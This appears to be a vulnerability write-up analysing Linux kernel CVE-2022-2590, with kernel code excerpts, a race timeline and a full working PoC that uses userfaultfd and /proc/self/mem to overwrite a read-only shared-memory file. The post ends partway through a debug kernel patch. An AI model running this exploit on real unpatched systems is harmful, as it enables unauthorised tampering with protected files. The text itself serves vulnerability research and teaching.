deayzl's blog
[Linux kernel] CVE-2022-2590: Dirty COW limited to shared memory
deayzl 2024. 7. 31. 00:35
An English version of this document is available at https://github.com/hyeonjun17/CVE-2022-2590-analysis
Analyzed and tested on: Linux/x86 6.0.0-rc1 (commit 37887783b3fef877bf34b8992c9199864da4afcb)
Introduction:
By using UFFDIO_CONTINUE to satisfy all three conditions checked in can_follow_write_pte (FOLL_FORCE, FOLL_COW and pte_dirty), this vulnerability allows arbitrary content to be written to a read-only shared memory page.
Analysis:
/*
 * FOLL_FORCE can write to even unwritable pte's, but only
 * after we've gone through a COW cycle and they are dirty.
 */
static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
{
    return pte_write(pte) ||
        ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
}
While looking up the PTE that is about to be written, this function decides whether that PTE may be written to.
It treats the PTE as writable if either of the following holds:
1. The PTE's flags mark it as writable.
2. flags contains both FOLL_FORCE and FOLL_COW, and the PTE's flags mark it as dirty.
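To make the two conditions concrete, here is a minimal user-space model of the check. The flag values and the `struct model_pte` type are hypothetical stand-ins chosen for illustration, not the kernel's definitions; only the boolean logic mirrors the excerpt above.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical flag values for this model only (not taken from include/linux/mm.h). */
#define MODEL_FOLL_WRITE 0x1u
#define MODEL_FOLL_FORCE 0x2u
#define MODEL_FOLL_COW   0x4u

/* Hypothetical stand-in for the two PTE bits the check looks at. */
struct model_pte {
    bool write;  /* models pte_write(pte) */
    bool dirty;  /* models pte_dirty(pte) */
};

/* Same boolean logic as can_follow_write_pte() in the excerpt above. */
static bool model_can_follow_write_pte(struct model_pte pte, unsigned int flags)
{
    return pte.write ||
           ((flags & MODEL_FOLL_FORCE) && (flags & MODEL_FOLL_COW) && pte.dirty);
}
```

In this model a read-only but dirty PTE is accepted only once FOLL_COW has been added next to FOLL_FORCE; a clean read-only PTE is always rejected.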
The three ingredients of condition 2 (FOLL_FORCE, FOLL_COW and a dirty PTE) can be obtained as follows.
1. FOLL_FORCE
static ssize_t mem_rw(struct file *file, char __user *buf,
                      size_t count, loff_t *ppos, int write)
{
    ...
    flags = FOLL_FORCE | (write ? FOLL_WRITE : 0);
    while (count > 0) {
        size_t this_len = min_t(size_t, count, PAGE_SIZE);
        if (write && copy_from_user(page, buf, this_len)) {
            copied = -EFAULT;
            break;
        }
        this_len = access_remote_vm(mm, addr, page, this_len, flags); // __get_user_pages with FOLL_FORCE on
        if (!this_len) {
            if (!copied)
                copied = -EIO;
            break;
        }
        ...
    }
This function implements reads and writes on /proc/<pid>/mem.
A write through it reaches __get_user_pages with FOLL_FORCE set.
FOLL_FORCE is primarily a ptrace flag, but the following commit explains why /proc/<pid>/mem needs it as well:
https://github.com/torvalds/linux/commit/f511c0b17b081562dca8ac5061dfa86db4c66cc2
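The effect of FOLL_FORCE can be observed from user space on a correctly working kernel: a write through /proc/self/mem to a private, read-only anonymous mapping succeeds, and the kernel places the data in the process's own private copy of the page without changing the mapping's protection. The sketch below assumes Linux with /proc mounted and access to /proc/self/mem not restricted (for example by a sandbox or a kernel hardening option); the helper name `force_write_readonly_page` is hypothetical.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Hypothetical helper: writes `value` into a PROT_READ private anonymous page
 * through /proc/self/mem and returns the byte read back through the mapping,
 * or -1 on any error.
 */
static int force_write_readonly_page(char value)
{
    long page_size = sysconf(_SC_PAGESIZE);
    char *map = mmap(NULL, (size_t)page_size, PROT_READ,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map == MAP_FAILED)
        return -1;

    int result = -1;
    int mem_fd = open("/proc/self/mem", O_RDWR);
    if (mem_fd >= 0) {
        /* In /proc/self/mem the file offset is the virtual address. */
        if (pwrite(mem_fd, &value, 1, (off_t)(uintptr_t)map) == 1)
            result = (unsigned char)map[0];  /* reading PROT_READ memory is fine */
        close(mem_fd);
    }
    munmap(map, (size_t)page_size);
    return result;
}
```

For a MAP_PRIVATE file mapping, the same forced write is supposed to land in an anonymous COW copy and never in the file's page cache; that guarantee is exactly what CVE-2022-2590 breaks.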
2. FOLL_COW
/*
 * mmap_lock must be held on entry. If @locked != NULL and *@flags
 * does not include FOLL_NOWAIT, the mmap_lock may be released. If it
 * is, *@locked will be set to 0 and -EBUSY returned.
 */
static int faultin_page(struct vm_area_struct *vma,
        unsigned long address, unsigned int *flags, bool unshare,
        int *locked)
{
    ...
    /*
     * The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
     * necessary, even if maybe_mkwrite decided not to set pte_write. We
     * can thus safely do subsequent page lookups as if they were reads.
     * But only do so when looping for pte_write is futile: in some cases
     * userspace may also be wanting to write to the gotten user page,
     * which a read fault here might prevent (a readonly page might get
     * reCOWed by userspace write).
     */
    if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
        *flags |= FOLL_COW;
    return 0;
}
This step relies on the FOLL_COW assignment in faultin_page, which was added as part of the Dirty COW (CVE-2016-5195) fix.
static long __get_user_pages(struct mm_struct *mm,
        unsigned long start, unsigned long nr_pages,
        unsigned int gup_flags, struct page **pages,
        struct vm_area_struct **vmas, int *locked)
{
    ...
retry:
    /*
     * If we have a pending SIGKILL, don't keep faulting pages and
     * potentially allocating memory.
     */
    if (fatal_signal_pending(current)) {
        ret = -EINTR;
        goto out;
    }
    cond_resched();
    page = follow_page_mask(vma, start, foll_flags, &ctx); // can_follow_write_pte
    if (!page || PTR_ERR(page) == -EMLINK) {
        ret = faultin_page(vma, start, &foll_flags,
                PTR_ERR(page) == -EMLINK, locked); // flags |= FOLL_COW
        switch (ret) {
        case 0:
            goto retry; // try follow page again
        case -EBUSY:
        case -EAGAIN:
            ret = 0;
            fallthrough;
        case -EFAULT:
        case -ENOMEM:
        case -EHWPOISON:
            goto out;
        }
        BUG();
    } else if (PTR_ERR(page) == -EEXIST) {
        ...
    }
FOLL_COW only reaches can_follow_write_pte if the first follow_page_mask call fails, __get_user_pages calls faultin_page, and execution jumps back to the retry label.
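The retry path can be modeled as a small loop. Everything here is a hypothetical simplification: `model_follow` stands in for follow_page_mask/can_follow_write_pte, and `model_faultin` stands in for faultin_page in the case where the forced write fault broke COW on a VMA without VM_WRITE (VM_FAULT_WRITE returned), which is when the real code adds FOLL_COW. The flag values are illustrative only.

```c
#include <assert.h>
#include <stdbool.h>

#define MODEL_FOLL_FORCE 0x2u   /* hypothetical values for this model only */
#define MODEL_FOLL_COW   0x4u

struct model_pte {
    bool write;
    bool dirty;
};

/* Stand-in for follow_page_mask() -> can_follow_write_pte(). */
static bool model_follow(const struct model_pte *pte, unsigned int flags)
{
    return pte->write ||
           ((flags & MODEL_FOLL_FORCE) && (flags & MODEL_FOLL_COW) && pte->dirty);
}

/*
 * Stand-in for faultin_page() after a write fault on a VMA without VM_WRITE:
 * COW was broken (new PTE dirty but not writable) and FOLL_COW is added.
 */
static void model_faultin(struct model_pte *pte, unsigned int *flags)
{
    pte->dirty = true;
    *flags |= MODEL_FOLL_COW;
}

/*
 * Returns how many lookups were needed before the write was allowed.
 * Assumes FOLL_FORCE is set; without it this model would never terminate.
 */
static int model_get_user_pages(struct model_pte *pte, unsigned int flags)
{
    int attempts = 0;
    for (;;) {                       /* the "retry:" label */
        attempts++;
        if (model_follow(pte, flags))
            return attempts;
        model_faultin(pte, &flags);  /* then "goto retry" */
    }
}
```

The detail that matters for this bug is that FOLL_COW survives into the second lookup; the race scenario swaps out the PTE between those two lookups.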
3. pte_dirty
This condition can be satisfied because of the following commit:
https://github.com/torvalds/linux/commit/9ae0f87d009ca6c4aab2882641ddfc319727e3db
/*
 * Install PTEs, to map dst_addr (within dst_vma) to page.
 *
 * This function handles both MCOPY_ATOMIC_NORMAL and _CONTINUE for both shmem
 * and anon, and for both shared and private VMAs.
 */
int mfill_atomic_install_pte(struct mm_struct *dst_mm, pmd_t *dst_pmd,
        struct vm_area_struct *dst_vma,
        unsigned long dst_addr, struct page *page,
        bool newly_allocated, bool wp_copy)
{
    ...
    _dst_pte = mk_pte(page, dst_vma->vm_page_prot);
    _dst_pte = pte_mkdirty(_dst_pte); // set pte dirty unconditionally
    if (page_in_cache && !vm_shared)
        writable = false;
    ...
}
Because of this commit, the PTE for a read-only shared memory page is always installed as dirty, even when it is not made writable.
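The PTE bits chosen by this part of mfill_atomic_install_pte can be summarized with a small model. The struct and function names are hypothetical, and taking the initial `writable` value from VM_WRITE is an assumption about the elided part of the function; the point is only that the dirty bit is set regardless of whether the PTE ends up writable.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical model of the PTE bits installed by mfill_atomic_install_pte(). */
struct model_pte {
    bool write;
    bool dirty;
};

static struct model_pte model_install_pte(bool vma_writable, bool vm_shared,
                                          bool page_in_cache)
{
    struct model_pte pte = { .write = false, .dirty = false };
    bool writable = vma_writable;     /* assumed initial value (VM_WRITE) */

    pte.dirty = true;                 /* pte_mkdirty(): unconditional */
    if (page_in_cache && !vm_shared)  /* page-cache page in a private VMA */
        writable = false;
    pte.write = writable;
    return pte;
}
```

The first case in the checks below is the PoC's situation: a PROT_READ, MAP_PRIVATE mapping of a shmem file, for which UFFDIO_CONTINUE installs a PTE that is read-only yet dirty.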
Once all three conditions are met, can_follow_write_pte returns true:
static struct page *follow_page_pte(struct vm_area_struct *vma,
        unsigned long address, pmd_t *pmd, unsigned int flags,
        struct dev_pagemap **pgmap)
{
    ...
    // true && !true == false
    if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags)) {
        pte_unmap_unlock(ptep, ptl);
        return NULL;
    }
    page = vm_normal_page(vma, address, pte); // get read-only shared memory page
    ...
out:
    pte_unmap_unlock(ptep, ptl);
    return page;
no_page:
    pte_unmap_unlock(ptep, ptl);
    if (!pte_none(pte))
        return NULL;
    return no_page_table(vma, flags);
}
As a result, follow_page_pte returns the read-only shared memory page for writing.
Race Scenario:
The following race scenario was confirmed with the PoC presented later.
| madvise and read | UFFDIO_CONTINUE ioctl | pwrite |
|---|---|---|
| madvise // zap the page | | |
| shmem_fault // read fault | | |
| handle_userfault | | |
| | userfaultfd_continue | |
| | mcontinue_atomic_pte | |
| | ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC); // get page | |
| | mfill_atomic_install_pte | |
| | _dst_pte = pte_mkdirty(_dst_pte); // make pte dirty | |
| | set_pte_at(dst_mm, dst_addr, dst_pte, _dst_pte); // install pte | mem_rw |
| | | access_remote_vm // with FOLL_FORCE |
| | | __get_user_pages |
| | | can_follow_write_pte // no FOLL_COW, return 0 |
| | | faultin_page |
| | | flags \|= FOLL_COW |
| | | retry: |
| madvise // zap the page | | follow_page_pte |
| shmem_fault // read fault | | |
| handle_userfault | | |
| | userfaultfd_continue | |
| | mcontinue_atomic_pte | |
| | ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC); // get page | |
| | mfill_atomic_install_pte | |
| | _dst_pte = pte_mkdirty(_dst_pte); // make pte dirty | |
| | | can_follow_write_pte // return 1 |
| | | copy_to_user_page(vma, page, addr, maddr + offset, buf, bytes) // write content to read-only page |
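The madvise-and-read routine runs twice. The first run leads __get_user_pages into faultin_page and the retry (picking up FOLL_COW on the way); the second run, which lands before the retried lookup, makes the PTE point again to the page-cache page that UFFDIO_CONTINUE installed as dirty.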
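The interleaving in the table can be replayed deterministically in a single thread. This is a hypothetical model, not kernel code: each page is a one-byte buffer, `madvise_zap` clears the PTE, `uffd_continue` installs the page-cache page as dirty but not writable, and `write_fault` models the forced write fault that copies the page into a private anonymous page and adds FOLL_COW. Where the final write lands shows why the second madvise-and-read is needed.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical flag values for this model only. */
#define MODEL_FOLL_FORCE 0x2u
#define MODEL_FOLL_COW   0x4u

struct model_pte {
    char *page;   /* NULL: no PTE (zapped) */
    bool write;
    bool dirty;
};

static char page_cache = 'a';  /* shmem page-cache page of the read-only file */
static char anon_copy;         /* the process's private COW copy */

/* madvise(MADV_DONTNEED): zap the PTE. */
static void madvise_zap(struct model_pte *pte)
{
    *pte = (struct model_pte){ .page = NULL, .write = false, .dirty = false };
}

/* Read fault -> minor userfault -> UFFDIO_CONTINUE on a private VMA. */
static void uffd_continue(struct model_pte *pte)
{
    *pte = (struct model_pte){ .page = &page_cache, .write = false, .dirty = true };
}

/* faultin_page(): forced write fault breaks COW and adds FOLL_COW. */
static void write_fault(struct model_pte *pte, unsigned int *flags)
{
    anon_copy = *pte->page;
    *pte = (struct model_pte){ .page = &anon_copy, .write = false, .dirty = true };
    *flags |= MODEL_FOLL_COW;
}

static bool can_follow_write(const struct model_pte *pte, unsigned int flags)
{
    return pte->page != NULL &&
           (pte->write ||
            ((flags & MODEL_FOLL_FORCE) && (flags & MODEL_FOLL_COW) && pte->dirty));
}

/* Replays the table; returns the page that receives the write, or NULL if the sequence diverges. */
static char *replay(bool second_madvise)
{
    struct model_pte pte = { .page = NULL, .write = false, .dirty = false };
    unsigned int flags = MODEL_FOLL_FORCE;   /* set by mem_rw() */

    page_cache = 'a';
    madvise_zap(&pte);                       /* 1st madvise and read */
    uffd_continue(&pte);
    if (can_follow_write(&pte, flags))       /* no FOLL_COW yet: must fail */
        return NULL;
    write_fault(&pte, &flags);               /* faultin_page(), then retry */
    if (second_madvise) {                    /* 2nd madvise and read, before the retry */
        madvise_zap(&pte);
        uffd_continue(&pte);
    }
    if (!can_follow_write(&pte, flags))      /* retried follow_page_pte() */
        return NULL;
    *pte.page = 'A';                         /* payload written by pwrite */
    return pte.page;
}
```

Without the second madvise-and-read the payload only reaches the private copy, which is the intended behavior; with it, the dirty page-cache PTE passes the same check and the shared page is modified.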
PoC and Patch:
https://www.openwall.com/lists/oss-security/2022/08/15/1
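David Hildenbrand's reproducer is available at the link above.
However, because it is hard to derive the exact race scenario from that reproducer, I modified it to make execution as linear as possible, and modified the Linux kernel source accordingly (debug printk calls and a 3-second delay in follow_page_pte, as shown in the patch below).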
.config:
...
CONFIG_USERFAULTFD=y
CONFIG_HAVE_ARCH_USERFAULTFD_WP=y
CONFIG_HAVE_ARCH_USERFAULTFD_MINOR=y
...
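Besides these build options, the PoC needs the running kernel to advertise UFFD_FEATURE_MINOR_SHMEM. A minimal probe could look like the sketch below, assuming uapi headers that provide <linux/userfaultfd.h> (the fallback values are the same ones the PoC hard-codes). The helper name `probe_minor_shmem` is hypothetical. Where unprivileged userfaultfd is disabled, blocked by a seccomp filter (common in containers), or UFFD_USER_MODE_ONLY is not understood (kernels before 5.11), the syscall fails and the probe reports -1.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef UFFD_FEATURE_MINOR_SHMEM
#define UFFD_FEATURE_MINOR_SHMEM (1 << 10)   /* same value as in the PoC */
#endif
#ifndef UFFD_USER_MODE_ONLY
#define UFFD_USER_MODE_ONLY 1
#endif

/*
 * Hypothetical helper. Returns 1 if UFFD_FEATURE_MINOR_SHMEM is reported,
 * 0 if it is not, and -1 if userfaultfd itself is unavailable.
 */
static int probe_minor_shmem(void)
{
    int uffd = (int)syscall(__NR_userfaultfd, O_CLOEXEC | UFFD_USER_MODE_ONLY);
    if (uffd < 0)
        return -1;

    /* Requesting no features makes UFFDIO_API report every supported one. */
    struct uffdio_api api = { .api = UFFD_API, .features = 0 };
    int ret = -1;
    if (ioctl(uffd, UFFDIO_API, &api) == 0)
        ret = (api.features & UFFD_FEATURE_MINOR_SHMEM) ? 1 : 0;
    close(uffd);
    return ret;
}
```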
PoC:
/*
 *
 * modified reproducer by deayzl (originally from David Hildenbrand <david@redhat.com>)
 *
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
#include <poll.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <linux/prctl.h>
#include <sys/prctl.h>

/* Fallbacks for uapi headers that predate minor-fault support; newer headers already define these. */
#ifndef UFFD_FEATURE_MINOR_SHMEM
#define UFFD_FEATURE_MINOR_SHMEM (1<<10)
#endif
#ifndef UFFDIO_REGISTER_MODE_MINOR
#define UFFDIO_REGISTER_MODE_MINOR ((__u64)1<<2)
#endif
#ifndef UFFD_USER_MODE_ONLY
#define UFFD_USER_MODE_ONLY 1
#endif
#ifndef UFFDIO_CONTINUE
#define _UFFDIO_CONTINUE (0x07)
#define UFFDIO_CONTINUE _IOWR(UFFDIO, _UFFDIO_CONTINUE, \
                              struct uffdio_continue)
struct uffdio_continue {
    struct uffdio_range range;
#define UFFDIO_CONTINUE_MODE_DONTWAKE ((__u64)1<<0)
    __u64 mode;
    /*
     * Fields below here are written by the ioctl and must be at the end:
     * the copy_from_user will not read past here.
     */
    __s64 mapped;
};
#endif

int mem_fd;
void *map;
int uffd;
char str[] = "AAAA";
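void *write_thread_fn(void *arg)
{
    /* Thread name matched by the debug printk calls in the kernel patch. */
    prctl(PR_SET_NAME, "pwrite");
    /* The /proc/self/mem file offset is the target virtual address. */
    pwrite(mem_fd, str, strlen(str), (uintptr_t) map);
    return NULL;
}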
static void *uffd_thread_fn(void *arg)
{
    static struct uffd_msg msg; /* Data read from userfaultfd */
    struct uffdio_continue uffdio;
    struct uffdio_range uffdio_wake;
    ssize_t nread;

    prctl(PR_SET_NAME, "uffd");
    while (1) {
        struct pollfd pollfd;
        int nready;

        pollfd.fd = uffd;
        pollfd.events = POLLIN;
        nready = poll(&pollfd, 1, -1);
        if (nready == -1) {
            fprintf(stderr, "poll() failed: %d\n", errno);
            exit(1);
        }
        nread = read(uffd, &msg, sizeof(msg));
        if (nread <= 0)
            continue;

        /* Resolve the minor fault by mapping the existing page-cache page. */
        uffdio.range.start = (unsigned long) map;
        uffdio.range.len = 4096;
        uffdio.mode = 0;
        if (ioctl(uffd, UFFDIO_CONTINUE, &uffdio) < 0) {
            if (errno == EEXIST) {
                /* PTE already present: just wake the faulting thread (errors ignored). */
                uffdio_wake.start = (unsigned long) map;
                uffdio_wake.len = 4096;
                if (ioctl(uffd, UFFDIO_WAKE, &uffdio_wake) < 0) {
                }
            } else {
                fprintf(stderr, "UFFDIO_CONTINUE failed: %d\n", errno);
            }
        }
    }
}
static int setup_uffd(void)
{
    struct uffdio_api uffdio_api;
    struct uffdio_register uffdio_register;

    uffd = syscall(__NR_userfaultfd,
                   O_CLOEXEC | O_NONBLOCK | UFFD_USER_MODE_ONLY);
    if (uffd < 0) {
        fprintf(stderr, "syscall(__NR_userfaultfd) failed: %d\n", errno);
        return -errno;
    }
    uffdio_api.api = UFFD_API;
    uffdio_api.features = UFFD_FEATURE_MINOR_SHMEM;
    if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) {
        fprintf(stderr, "UFFDIO_API failed: %d\n", errno);
        return -errno;
    }
    if (!(uffdio_api.features & UFFD_FEATURE_MINOR_SHMEM)) {
        fprintf(stderr, "UFFD_FEATURE_MINOR_SHMEM missing\n");
        return -ENOSYS;
    }
    /* Minor faults: page present in the page cache, but no PTE mapped yet. */
    uffdio_register.range.start = (unsigned long) map;
    uffdio_register.range.len = 4096;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MINOR;
    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) {
        fprintf(stderr, "UFFDIO_REGISTER failed: %d\n", errno);
        return -errno;
    }
    return 0;
}
static void print_content(int fd)
{
    ssize_t ret;
    char buf[80];
    int offs = 0;

    while (1) {
        ret = pread(fd, buf, sizeof(buf) - 1, offs);
        if (ret > 0) {
            buf[ret] = 0;
            printf("%s", buf);
            offs += ret;
        } else if (!ret) {
            break;
        } else {
            fprintf(stderr, "pread() failed: %d\n", errno);
            break; /* avoid retrying the same failing read forever */
        }
    }
    printf("\n");
}
int main(int argc, char *argv[])
{
    pthread_t thread1, thread2;
    int fd;

    if (argc == 2) {
        fd = open(argv[1], O_RDONLY);
        if (fd < 0) {
            fprintf(stderr, "open() failed: %d\n", errno);
            return 1;
        }
    } else {
        fprintf(stderr, "usage: %s target_file\n", argv[0]);
        return 1;
    }
    mem_fd = open("/proc/self/mem", O_RDWR);
    if (mem_fd < 0) {
        fprintf(stderr, "open(/proc/self/mem) failed: %d\n", errno);
        return 1;
    }
    /* Read-only private mapping of the shmem-backed target file. */
    map = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0);
    if (map == MAP_FAILED) {
        fprintf(stderr, "mmap() failed: %d\n", errno);
        return 1;
    }
    if (setup_uffd())
        return 1;
    printf("Old content: \n");
    print_content(fd);

    int ret;
    volatile int tmp; /* volatile so the faulting reads below are not optimized away */
    pthread_create(&thread1, NULL, uffd_thread_fn, NULL);

    /* First madvise and read: zap the page and fault it back in via UFFDIO_CONTINUE. */
    prctl(PR_SET_NAME, "madvise");
    ret = madvise(map, 4096, MADV_DONTNEED);
    if (ret < 0) {
        fprintf(stderr, "madvise() failed: %d\n", errno);
        exit(1);
    }
    tmp = *((int *)map);
    pthread_create(&thread2, NULL, write_thread_fn, NULL);
    /* sleep() takes whole seconds, so sleep(0.3) would not wait at all. */
    usleep(300000);

    /* Second madvise and read: should land while pwrite waits between faultin_page and the retry. */
    prctl(PR_SET_NAME, "madvise");
    ret = madvise(map, 4096, MADV_DONTNEED);
    if (ret < 0) {
        fprintf(stderr, "madvise() failed: %d\n", errno);
        exit(1);
    }
    tmp = *((int *)map);
    sleep(5);
    printf("New content: \n");
    print_content(fd);
    return 0;
}
Patch:
diff --git a/Makefile b/Makefile
index f09673b6c11d..cd952e1b49f0 100644
--- a/Makefile
+++ b/Makefile
@@ -789,7 +789,8 @@ stackp-flags-$(CONFIG_STACKPROTECTOR_STRONG) := -fstack-protector-strong
KBUILD_CFLAGS += $(stackp-flags-y)
KBUILD_CFLAGS-$(CONFIG_WERROR) += -Werror
-KBUILD_CFLAGS-$(CONFIG_CC_NO_ARRAY_BOUNDS) += -Wno-array-bounds
+# KBUILD_CFLAGS-$(CONFIG_CC_NO_ARRAY_BOUNDS) += -Wno-array-bounds
+KBUILD_CFLAGS += -Wno-array-bounds -Wno-format
KBUILD_CFLAGS += $(KBUILD_CFLAGS-y) $(CONFIG_CC_IMPLICIT_FALLTHROUGH)
ifdef CONFIG_CC_IS_CLANG
diff --git a/fs/userfaultfd.c b/fs/userfaultfd.c
index 1c44bf75f916..004f7c391903 100644
--- a/fs/userfaultfd.c
+++ b/fs/userfaultfd.c
@@ -1450,7 +1450,7 @@ static int userfaultfd_register(struct userfaultfd_ctx *ctx,
* the current one has not been updated yet.
*/
vma->vm_flags = new_flags;
- vma->vm_userfaultfd_ctx.ctx = ctx;
+ vma->vm_userfaultfd_ctx.ctx = ctx;if((new_flags&VM_UFFD_MINOR)!=0){printk(KERN_ALERT "[userfaultfd_register] uffd registered at vma: 0x%lx as UFFDIO_REGISTER_MODE_MINOR (ctx: 0x%lx)\n", (unsigned long)vma, (unsigned long)ctx);}
if (is_vm_hugetlb_page(vma) && uffd_disable_huge_pmd_share(vma))
hugetlb_unshare_all_pmds(vma);
diff --git a/mm/gup.c b/mm/gup.c
index 732825157430..1f3a4a0c67b3 100644
--- a/mm/gup.c
+++ b/mm/gup.c
@@ -483,11 +483,11 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address,
* after we've gone through a COW cycle and they are dirty.
*/
static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
-{
+{if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[can_follow_write_pte/%s] res: %d(%d && %d && %d) (pte=0x%lx)\n", current->comm, pte_write(pte) || ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte)), flags & FOLL_FORCE, flags & FOLL_COW, pte_dirty(pte), pte_val(pte));}
return pte_write(pte) ||
((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
}
-
+bool do_ssleep=false;
static struct page *follow_page_pte(struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd, unsigned int flags,
struct dev_pagemap **pgmap)
@@ -505,7 +505,7 @@ static struct page *follow_page_pte(struct vm_area_struct *vma,
retry:
if (unlikely(pmd_bad(*pmd)))
return no_page_table(vma, flags);
-
+ if(do_ssleep && !strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[follow_page_pte/%s] before ssleep 1\n", current->comm);schedule_timeout_interruptible(3 * HZ);printk(KERN_ALERT "[follow_page_pte/%s] after ssleep 1\n", current->comm);do_ssleep=false;}
ptep = pte_offset_map_lock(mm, pmd, address, &ptl);
pte = *ptep;
if (!pte_present(pte)) {
@@ -995,6 +995,7 @@ static int faultin_page(struct vm_area_struct *vma,
* which a read fault here might prevent (a readonly page might get
* reCOWed by userspace write).
*/
+ if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[faultin_page/%s] if %d && %d, set flags FOLL_COW\n", current->comm, (ret & VM_FAULT_WRITE), !(vma->vm_flags & VM_WRITE));do_ssleep=true;}
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags |= FOLL_COW;
return 0;
@@ -1190,10 +1191,10 @@ static long __get_user_pages(struct mm_struct *mm,
}
cond_resched();
- page = follow_page_mask(vma, start, foll_flags, &ctx);
+ page = follow_page_mask(vma, start, foll_flags, &ctx);if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[__get_user_pages/%s] page: 0x%lx\n", current->comm, (unsigned long)page);}
if (!page || PTR_ERR(page) == -EMLINK) {
ret = faultin_page(vma, start, &foll_flags,
- PTR_ERR(page) == -EMLINK, locked);
+ PTR_ERR(page) == -EMLINK, locked);if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[__get_user_pages/%s] faultin_page returns %d\n", current->comm, ret);}
switch (ret) {
case 0:
goto retry;
diff --git a/mm/memory.c b/mm/memory.c
index 4ba73f5aa8bb..de3ffc8ff3ab 100644
--- a/mm/memory.c
+++ b/mm/memory.c
@@ -4654,7 +4654,7 @@ static vm_fault_t do_fault(struct vm_fault *vmf)
if (vmf->prealloc_pte) {
pte_free(vm_mm, vmf->prealloc_pte);
vmf->prealloc_pte = NULL;
- }
+ }if(!strcmp(current->comm, "madvise")){unsigned long tmp = vmf->pte != 0 ? pte_val(*vmf->pte) : 0;printk(KERN_ALERT "[do_fault/%s] after do_read_fault, vmf->pte: 0x%lx\n", current->comm, tmp);}
return ret;
}
diff --git a/mm/shmem.c b/mm/shmem.c
index 5783f11351bb..370333c7fb13 100644
--- a/mm/shmem.c
+++ b/mm/shmem.c
@@ -1554,7 +1554,7 @@ static struct folio *shmem_alloc_folio(gfp_t gfp,
struct folio *folio;
shmem_pseudo_vma_init(&pvma, info, index);
- folio = vma_alloc_folio(gfp, 0, &pvma, 0, false);
+ folio = vma_alloc_folio(gfp, 0, &pvma, 0, false);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[shmem_alloc_folio/%s] vma_alloc_folio returns folio: 0x%lx\n", current->comm, (unsigned long)folio);}
shmem_pseudo_vma_destroy(&pvma);
return folio;
@@ -1855,13 +1855,13 @@ static int shmem_getpage_gfp(struct inode *inode, pgoff_t index,
sbinfo = SHMEM_SB(inode->i_sb);
charge_mm = vma ? vma->vm_mm : NULL;
- folio = __filemap_get_folio(mapping, index, FGP_ENTRY | FGP_LOCK, 0);
+ folio = __filemap_get_folio(mapping, index, FGP_ENTRY | FGP_LOCK, 0);//if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] __filemap_get_folio returns folio: 0x%lx\n", current->comm, (unsigned long)folio);}
if (folio && vma && userfaultfd_minor(vma)) {
if (!xa_is_value(folio)) {
folio_unlock(folio);
folio_put(folio);
- }
- *fault_type = handle_userfault(vmf, VM_UFFD_MINOR);
+ }if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] handle_userfault starts\n", current->comm);}
+ *fault_type = handle_userfault(vmf, VM_UFFD_MINOR);if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] handle_userfault ends\n", current->comm);}
return 0;
}
@@ -2013,7 +2013,7 @@ static int shmem_getpage_gfp(struct inode *inode, pgoff_t index,
goto unlock;
}
out:
- *pagep = folio_page(folio, index - hindex);
+ *pagep = folio_page(folio, index - hindex);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] folio_page returns page: 0x%lx\n", current->comm, (unsigned long)*pagep);}
return 0;
/*
@@ -2123,7 +2123,7 @@ static vm_fault_t shmem_fault(struct vm_fault *vmf)
}
err = shmem_getpage_gfp(inode, vmf->pgoff, &vmf->page, SGP_CACHE,
- gfp, vma, vmf, &ret);
+ gfp, vma, vmf, &ret);if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_fault/%s] shmem_getpage_gfp(page=0x%lx) returns %d\n", current->comm, (unsigned long)vmf->page, err);}
if (err)
return vmf_error(err);
return ret;
diff --git a/mm/userfaultfd.c b/mm/userfaultfd.c
index 07d3befc80e4..29acbe56bf2c 100644
--- a/mm/userfaultfd.c
+++ b/mm/userfaultfd.c
@@ -70,7 +70,7 @@ int mfill_atomic_install_pte(struct mm_struct *dst_mm, pmd_t *dst_pmd,
pgoff_t offset, max_off;
_dst_pte = mk_pte(page, dst_vma->vm_page_prot);
- _dst_pte = pte_mkdirty(_dst_pte);
